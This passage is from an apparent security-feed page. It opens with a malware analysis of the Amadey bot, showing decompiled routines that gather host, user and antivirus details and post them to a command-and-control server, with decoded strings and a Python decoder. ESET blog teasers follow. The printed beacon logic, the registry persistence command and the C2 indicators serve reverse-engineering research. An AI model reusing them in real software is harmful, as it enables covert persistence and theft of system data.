MinGW(-)[-] PE: linker: GNU linker ld (GNU Binutils)(2.56*)[EXE32] </code></pre></div></div> It contains symbol information. Amedey has the following functions: <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>_Z10aBypassUACv _Z10aCharToIntPc _Z10aGetOsArchv _Z10aIntToChari _Z11aAutoRunSetPc _Z11aCheckAdminv _Z11aCreateFilePc _Z11aFileExistsPKc _Z11aGetTempDirv _Z11aProcessDllPcS_ _Z11aProcessExePcS_S_S_ _Z11aRunAsAdminPc _Z12aGetHostNamev _Z12aGetSelfPathv _Z12aGetUserNamev _Z12aProcessTaskPc _Z12aResolveHostPc _Z12aWinSockPostPcS_S_ _Z13aDropToSystemPc _Z13aGetProcessILv _Z14aCreateProcessPc _Z14aGetProgramDirv _Z15aUrlMonDownloadPcS_ _Z16aDirectoryExistsPc _Z16aExtractFileNamePc _Z16aGetHomeDriveDirv _Z16aProcessDllLocalPcS_S_S_ _Z16aProcessExeLocalPcS_S_S_ _Z19aGetSelfDestinationi _Z5aCopyPcii _Z5aParsPcS_ _Z6aBasici _Z6aGetIdv _Z6aGetOsv _Z6aMkDirPc _Z7aPathAVPc _Z7aRaportPcS_ _Z8aCheckAVv _Z8aDecryptPc _Z8aPosLastPcS_ _Z9aCopyFilePcS_ _Z9aFileSizePc _Z9aFillCharPc _Z9aFreeFilePc _Z9aPosFirstPcS_ _Z9aRunDll32PcS_ </code></pre></div></div> The main function is as follows. <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __cdecl main(int _Argc,char **_Argv,char **_Env) { char *pcVar1; /* 0x3ac8 97 main */ FUN_00404020(); FUN_00403cc0(); _Z10aBypassUACv(); pcVar1 = _Z12aGetSelfPathv(); _Z13aDropToSystemPc(pcVar1); pcVar1 = _Z19aGetSelfDestinationi(0); _Z11aAutoRunSetPc(pcVar1); _Z6aBasici(0); return 0; } </code></pre></div></div> The _Z6aBasici function is as follows. <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */ void __cdecl _Z6aBasici(int param_1) { char *_Source; uint uVar1; int iVar2; /* 0x33fe 32 _Z6aBasici */ FUN_00404020(); _Z9aFillCharPc(&stack0xffffeff4); _Z9aFillCharPc(&stack0xffffddf4); _Z9aFillCharPc(&stack0xffffdbf4); _Source = _Z8aDecryptPc(&aDomain); strcat(&stack0xffffddf4,_Source); _Source = _Z8aDecryptPc(&aScript); strcat(&stack0xffffdbf4,_Source); _Source = _Z8aDecryptPc(&aParam0); strcat(&stack0xffffeff4,_Source); _Source = _Z6aGetIdv(); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam1); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aVers); strcat(&stack0xffffeff4,_Source); uVar1 = _Z11aCheckAdminv(); if ((uVar1 & 0xff) == 1) { _Source = _Z8aDecryptPc(&aParam2); strcat(&stack0xffffeff4,_Source); strcat(&stack0xffffeff4,"1"); } else { _Source = _Z8aDecryptPc(&aParam2); strcat(&stack0xffffeff4,_Source); strcat(&stack0xffffeff4,"0"); } _Source = _Z8aDecryptPc(&aParam3); strcat(&stack0xffffeff4,_Source); _Source = _Z10aGetOsArchv(); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam4); strcat(&stack0xffffeff4,_Source); _Source = _Z10aIntToChari(param_1); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam5); strcat(&stack0xffffeff4,_Source); iVar2 = _Z6aGetOsv(); _Source = _Z10aIntToChari(iVar2); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam6); strcat(&stack0xffffeff4,_Source); uVar1 = _Z8aCheckAVv(); _Source = _Z10aIntToChari(uVar1); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam7); strcat(&stack0xffffeff4,_Source); _Source = _Z12aGetHostNamev(); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam8); strcat(&stack0xffffeff4,_Source); _Source = _Z12aGetUserNamev(); strcat(&stack0xffffeff4,_Source); strcat(&stack0xffffeff4,"&"); if (param_1 == 0) { do { _Z9aFillCharPc(&stack0xffffdff4); _Source = _Z12aWinSockPostPcS_S_(&stack0xffffddf4,&stack0xffffdbf4,&stack0xffffeff4); strcat(&stack0xffffdff4,_Source); _Z5aParsPcS_(&stack0xffffdff4,"#"); Sleep(_aTimeOut); } while( true ); } if (param_1 == 1) { _Z12aWinSockPostPcS_S_(&stack0xffffddf4,&stack0xffffdbf4,&stack0xffffeff4); } return; } </code></pre></div></div> Some important parameters are encoded. However, the encoding algorithm is very simple. <img src="https://nao-sec.org/assets/2019-04-28/03.jpg" width="80%" /> key is <code class="language-plaintext highlighter-rouge">8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7</code> <img src="https://nao-sec.org/assets/2019-04-28/04.jpg" width="100%" /> Finally, we analyze the decoded string and the name of the function in which it was used. <ul> <li><code class="language-plaintext highlighter-rouge">_Z11aAutoRunSetPc</code> <ul> <li>AutoRunCmd : <code class="language-plaintext highlighter-rouge">REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d </code></li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z8aCheckAVv</code> <ul> <li>AV00 : AVAST Software</li> <li>AV01 : Avira</li> <li>AV02 : Kaspersky Lab</li> <li>AV03 : ESET</li> <li>AV04 : Panda Security</li> <li>AV05 : Doctor Web</li> <li>AV06 : AVG</li> <li>AV07 : 360TotalSecurity</li> <li>AV08 : Bitdefender</li> <li>AV09 : Norton</li> <li>AV10 : Sophos</li> <li>AV11 : Comodo</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z12aWinSockPostPcS_S_</code> <ul> <li>CMD0 : <code class="language-plaintext highlighter-rouge"><c></code></li> <li>CMD1 : <code class="language-plaintext highlighter-rouge"><d></code></li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z11aProcessDllPcS_</code> <ul> <li>dll : dll</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z7aRaportPcS_, _Z6aBasici</code> <ul> <li>domain : gohaiendo[.]com</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z19aGetSelfDestinationi</code> <ul> <li>DropDir : f64a428dfd</li> <li>DropName : cmualrc.exe</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z11aProcessExePcS_S_S_</code> <ul> <li>exe : exe</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z14aGetProgramDirv</code> <ul> <li>GetProgDir : ProgramData\</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z10aGetOsArchv, _Z6aGetOsv</code> <ul> <li>OS_AR0 : kernel32.dll</li> <li>OS_AR1 : GetNativeSystemInfo</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z6aBasici</code> <ul> <li>Param0 : id=</li> <li>Param1 : &vs=</li> <li>Param2 : &ar=</li> <li>Param3 : &bi=</li> <li>Param4 : &lv=</li> <li>Param5 : &os=</li> <li>Param6 : &av=</li> <li>Param7 : &pc=</li> <li>Param8 : &un=</li> <li>Vers : 1.22</li> <li>ZoneIdent : <code class="language-plaintext highlighter-rouge">:Zone.Identifier</code></li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z12aWinSockPostPcS_S_</code> <ul> <li>Post0 : 1310</li> <li>Post1 : HTTP/1.1</li> <li>Post2 : Accept: /</li> <li>Post3 : Content-Type: application/x-www-form-urlencoded</li> <li>Post4 : Host:</li> <li>Post5 : Content-Length:</li> <li>Post6 : POST /</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z11aRunAsAdminPc</code> <ul> <li>RunAs : runas</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z9aRunDll32PcS_</code> <ul> <li>RunDll_0 : rundll32.exe</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z7aRaportPcS_, _Z6aBasici</code> <ul> <li>Script : ppk/index.php</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z11aCheckAdminv</code> <ul> <li>Shell : SHELL32.DLL</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z14aCreateProcessPc, _Z6aBasici</code> <ul> <li>TimeOut : 40133-98-10017</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z15aUrlMonDownloadPcS_</code> <ul> <li>URLMon_0 : urlmon</li> <li>URLMon_1 : URLDownloadToFileA</li> </ul> </li> </ul> Here is the simple python script. <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>''' domain=[0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D] AutoRunCmdr=[0x8A, 0xAA, 0xA9, 0x84, 0x74, 0x7D, 0x7D, 0x54, 0x58, 0x81, 0x7E, 0xA5, 0x85, 0xC0, 0x87, 0xA8, 0x9D, 0xAA, 0xA7, 0x93, 0xA3, 0x9C, 0x91, 0x85, 0xCC, 0x95, 0xD6, 0xA6, 0xD5, 0xD5, 0xCC, 0xAB, 0x95, 0x8A, 0xCB, 0x9E, 0xC8, 0xA3, 0xB0, 0xAA, 0x92, 0x73, 0xA7, 0xA3, 0xA9, 0x9A, 0xA6, 0xD7, 0x88, 0xC9, 0xA9, 0xD5, 0xCF, 0xD5, 0xA5, 0x94, 0xAA, 0xDA, 0xD4, 0x9F, 0xA8, 0xAB, 0x99, 0xA8, 0x95, 0x88, 0xD5, 0x95, 0xD6, 0x54, 0x8C, 0x9F, 0x9B, 0x9C, 0x9E, 0x51, 0x7D, 0xA4, 0xA4, 0xC7, 0x97, 0xD6, 0xAA, 0x84, 0x86, 0x95, 0x9D, 0x59, 0x62, 0xD8, 0x50, 0xB7, 0xA8, 0x9A, 0xA9, 0xAA, 0xA5, 0xA2, 0x51, 0x66, 0xA9, 0x58, 0xB5, 0x77, 0xAB, 0x96, 0xB5, 0xC0, 0x86, 0x66, 0x9C, 0x85] AV00=[0x79, 0xBB, 0xA3, 0xB7, 0x87, 0x59, 0x8C, 0xA3, 0x9C, 0xAD, 0xAA, 0xC3, 0xA2, 0xC9]#AV00 AV01=[0x79, 0xDB, 0xCB, 0xD6, 0x94] AV02=[0x83, 0xC6, 0xD5, 0xD4, 0x98, 0xAB, 0xAC, 0x9F, 0xAF, 0x59, 0x7F, 0xC3, 0x92] AV03=[0x7D, 0xB8, 0xA7, 0xB8] AV04=[0x88, 0xC6, 0xD0, 0xC8, 0x94, 0x59, 0x8C, 0x99, 0x99, 0xAE, 0xA5, 0xCB, 0xA4, 0xDD] AV05=[0x7C, 0xD4, 0xC5, 0xD8, 0xA2, 0xAB, 0x59, 0x8B, 0x9B, 0x9B] AV06=[0x79, 0xBB, 0xA9] AV07=[0x6B, 0x9B, 0x92, 0xB8, 0xA2, 0xAD, 0x9A, 0xA0, 0x89, 0x9E, 0x96, 0xD7, 0xA2, 0xCD, 0xA8, 0xB2] AV08=[0x7A, 0xCE, 0xD6, 0xC8, 0x98, 0x9F, 0x9E, 0xA2, 0x9A, 0x9E, 0xA5] AV09=[0x86, 0xD4, 0xD4, 0xD8, 0xA2, 0xA7] AV10=[0x8B, 0xD4, 0xD2, 0xCC, 0xA2, 0xAC] AV11=[0x7B, 0xD4, 0xCF, 0xD3, 0x97, 0xA8] CMD0=[0x74, 0xC8, 0xA0] CMD1=[0x74, 0xC9, 0xA0] DLL=[0x9C, 0xD1, 0xCE] DropDir=[0x9E, 0x9B, 0x96, 0xC5, 0x67, 0x6B, 0x71, 0x98, 0x9C, 0x9D] DropName=[0x9B, 0xD2, 0xD7, 0xC5, 0x9F, 0xAB, 0x9C, 0x62, 0x9B, 0xB1, 0x98] exe=[0x9D, 0xDD, 0xC7] GetProgDir=[0x88, 0xD7, 0xD1, 0xCB, 0xA5, 0x9A, 0xA6, 0x78, 0x97, 0xAD, 0x94, 0xBE] OS_AR0=[0xA3, 0xCA, 0xD4, 0xD2, 0x98, 0xA5, 0x6C, 0x66, 0x64, 0x9D, 0x9F, 0xCE] OS_AR1=[0x7F, 0xCA, 0xD6, 0xB2, 0x94, 0xAD, 0xA2, 0xAA, 0x9B, 0x8C, 0xAC, 0xD5, 0xA4, 0xC9, 0xA1, 0x82, 0xA5, 0x9C, 0x9F] Param0=[0xA1, 0xC9, 0x9F] Param1=[0x5E, 0xDB, 0xD5, 0xA1] Param2=[0x5E, 0xC6, 0xD4, 0xA1] Param3=[0x5E, 0xC7, 0xCB, 0xA1] Param4=[0x5E, 0xD1, 0xD8, 0xA1] Param5=[0x5E, 0xD4, 0xD5, 0xA1] Param6=[0x5E, 0xC6, 0xD8, 0xA1] Param7=[0x5E, 0xD5, 0xC5, 0xA1] Param8=[0x5E, 0xDA, 0xD0, 0xA1] Post0=[0x45, 0x6F] Post1=[0x58, 0xAD, 0xB6, 0xB8, 0x83, 0x68, 0x6A, 0x62, 0x67] Post2=[0x79, 0xC8, 0xC5, 0xC9, 0xA3, 0xAD, 0x73, 0x54, 0x60, 0x68, 0x5D] Post3=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x8A, 0xB2, 0xA3, 0xC7, 0x6A, 0x84, 0x95, 0xA9, 0xA7, 0xA2, 0x99, 0x95, 0x92, 0xAB, 0x9E, 0xA7, 0xD1, 0x61, 0xDC, 0x64, 0xD9, 0xDD, 0xDD, 0x64, 0x9F, 0xA2, 0xD4, 0x9D, 0x91, 0xA9, 0xAB, 0xA3, 0x9B, 0x9E, 0x95, 0xA0, 0x9B, 0x9A, 0x9C] Post4=[0x80, 0xD4, 0xD5, 0xD8, 0x6D, 0x59] Post5=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x82, 0x9E, 0xA1, 0xC9, 0xA4, 0xCC, 0x6E, 0x59] Post6=[0x88, 0xB4, 0xB5, 0xB8, 0x53, 0x68] RunAs=[0xAA, 0xDA, 0xD0, 0xC5, 0xA6] RunDll_0=[0xAA, 0xDA, 0xD0, 0xC8, 0x9F, 0xA5, 0x6C, 0x66, 0x64, 0x9E, 0xAB, 0xC7, 0x50] Script=[0xA8, 0xD5, 0xCD, 0x93, 0x9C, 0xA7, 0x9D, 0x99, 0xAE, 0x67, 0xA3, 0xCA, 0xA0] Shell=[0x8B, 0xAD, 0xA7, 0xB0, 0x7F, 0x6C, 0x6B, 0x62, 0x7A, 0x85, 0x7F] TimeOut=[0x60, 0xEA, 0x00, 0x00, 0x44] URLMon_0=[0xAD, 0xD7, 0xCE, 0xD1, 0xA2, 0xA7] URLMon_1=[0x8D, 0xB7, 0xAE, 0xA8, 0xA2, 0xB0, 0xA7, 0xA0, 0xA5, 0x9A, 0x97, 0xB6, 0x9F, 0xAA, 0x9D, 0xA5, 0x9C, 0x77] Vers=[0x69, 0x93, 0x94, 0x96] ZoneIdent =[0x72, 0xBF, 0xD1, 0xD2, 0x98, 0x67, 0x82, 0x98, 0x9B, 0xA7, 0xA7, 0xCB, 0x96, 0xCD, 0x99, 0xAB] ''' encoded_str=[0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D] Key="8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7" c=0 while(1): length = len(encoded_str) if length <= c: break length = len(Key); print(chr(encoded_str[c] - ord(Key[c % length])), end='') #print(encoded_str[c] - ord(Key[c % length]), end='') c += 1 </code></pre></div></div> <h1 id="references">References</h1> <ul> <li>https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/</li> </ul>
The evolving landscape of data privacy: Key trends to shape 2025

Thu, 23 Jan 2025 12:06:40 -0000

Incoming laws, combined with broader developments on the threat landscape, will create further complexity and urgency for security and compliance teams. As Data Privacy Week (January 27-31) and Data Protection Day (January 28) approach, it’s the perfect time to spotlight the critical role data protection plays in the success of modern organizations. In fact, privacy and data protection go … <a class="more-link" href="https://blog.eset.ie/2025/01/23/the-evolving-landscape-of-data-privacy-key-trends-to-shape-2025/">More The evolving landscape of data privacy: Key trends to shape 2025</a>
ESET discovers new APT group and its supply chain attack on South Korean VPN service

Wed, 22 Jan 2025 09:53:44 -0000

ESET researchers have discovered a supply-chain attack against a VPN provider in South Korea by a newly discovered and previously undetected China-aligned APT group that ESET has named PlushDaemon. In this cyberespionage operation, the attackers replaced the legitimate installer with one that also deployed the group’s signature implant, which ESET has named SlowStepper — a … <a class="more-link" href="https://blog.eset.ie/2025/01/22/eset-discovers-new-apt-group-and-its-supply-chain-attack-on-south-korean-vpn-service/">More ESET discovers new APT group and its supply chain attack on South Korean VPN service</a>
Under lock and key: Protecting corporate data from cyberthreats in 2025

Tue, 21 Jan 2025 12:05:23 -0000

Data breaches can cause a loss of revenue and market value as a result of diminished customer trust and reputational damage. There were over 3,200 data compromises in the United States in 2023, with 353 million victims, including those affected multiple times, according to the US Identity Theft Resource Center (ITRC). Each one of those individuals … <a class="more-link" href="https://blog.eset.ie/2025/01/21/under-lock-and-key-protecting-corporate-data-from-cyberthreats-in-2025/">More Under lock and key: Protecting corporate data from cyberthreats in 2025</a>
Europe prepared strategy to protect hospitals from cyberattacks

Thu, 16 Jan 2025 11:05:05 -0000

The European Union is stepping in to help hospitals and healthcare providers combat increasing cyberattacks. According to Politico*, the European Commission has unveiled “action plan” to enhance cybersecurity in the sector, which includes additional funding for securing hospitals’ technical infrastructure, guidance on applying existing rules like the EU’s NIS2 cybersecurity directive, and improved information-sharing. Since … <a class="more-link" href="https://blog.eset.ie/2025/01/16/europe-prepared-strategy-to-protect-hospitals-from-cyberattacks/">More Europe prepared strategy to protect hospitals from cyberattacks</a>
ESET Research discovers UEFI Secure Boot bypass vulnerability

Thu, 16 Jan 2025 10:28:03 -0000

ESET researchers have discovered a vulnerability, affecting the majority of UEFI-based systems, that allows actors to bypass UEFI Secure Boot. This vulnerability, assigned CVE-2024-7344, was found in a UEFI application signed by Microsoft’s “Microsoft Corporation UEFI CA 2011” third-party UEFI certificate. Exploitation of this vulnerability can lead to the execution of untrusted code during system … <a class="more-link" href="https://blog.eset.ie/2025/01/16/eset-research-discovers-uefi-secure-boot-bypass-vulnerability/">More ESET Research discovers UEFI Secure Boot bypass vulnerability</a>

Pipes Feed Preview: Feed not found & SECURITY.COM & TeamT5 Blog & Natto Thoughts & JPCERT/CCブログ 日本語版 & nao_sec & ESET Ireland & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided

Pipes Feed Preview: Feed not found & SECURITY.COM & TeamT5 Blog & Natto Thoughts & JPCERT/CCブログ日本語版 & nao_sec & ESET Ireland & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided